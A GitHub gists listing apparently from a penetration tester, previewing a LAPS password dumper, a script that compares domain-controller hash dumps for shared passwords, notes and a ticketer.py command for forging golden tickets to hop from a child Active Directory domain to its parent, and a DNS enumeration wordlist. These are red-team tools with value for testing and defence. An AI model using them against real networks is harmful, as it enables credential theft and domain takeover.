n00py
/ laps.py
Created
November 11, 2022 16:10
— forked from jstnkndy/laps.py
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE | |
| import argparse | |
| parser = argparse.ArgumentParser(description='Dump LAPS Passwords') | |
| parser.add_argument('-u','--username', help='username for LDAP', required=True) | |
| parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True) | |
| parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False) | |
| parser.add_argument('-d','--domain', help='Domain', required=True) | |
| parser.add_argument('-t', '--target', help="Target Domain", required=False) |
n00py
/ check_hashes.py
Created
July 25, 2022 21:14
— forked from bandrel/check_hashes.py
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| #Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller | |
| #Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH::: | |
| # ./check_hashes.py <hash_dump> | |
| import argparse | |
| import re | |
| parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords") |
n00py
/ domainhop.txt
Last active
April 29, 2022 22:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Golden Tickets to hop domains: | |
| Requirements: | |
| Get krbtgt hash from child domain (secretsdump) | |
| Get SID of domain and SID of Enterprise admins group in parent domain (ldapdomaindump/bloodhound) | |
| ticketer.py -nthash | |
| [KRBTGT NT HASH FOR CHILD.PARENT.LOCAL] -domain-sid [SID FOR CHILD.PARENT.LOCAL] | |
| -domain CHILD.PARENT.LOCAL -extra-sid [SID OF ENTERPRISE ADMINS IN PARENT.LOCAL] | |
| [USERNAME IN CHILD.PARENT.LOCAL] |
n00py
/ all.txt
Created
June 26, 2018 22:08
— forked from haccer/all.txt
all wordlists for every dns enumeration tool... ever.
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 0-0 | |
| 000 | |
| 0000 | |
| 00000 | |
| 000000 | |
| 000005 | |
| 00001 |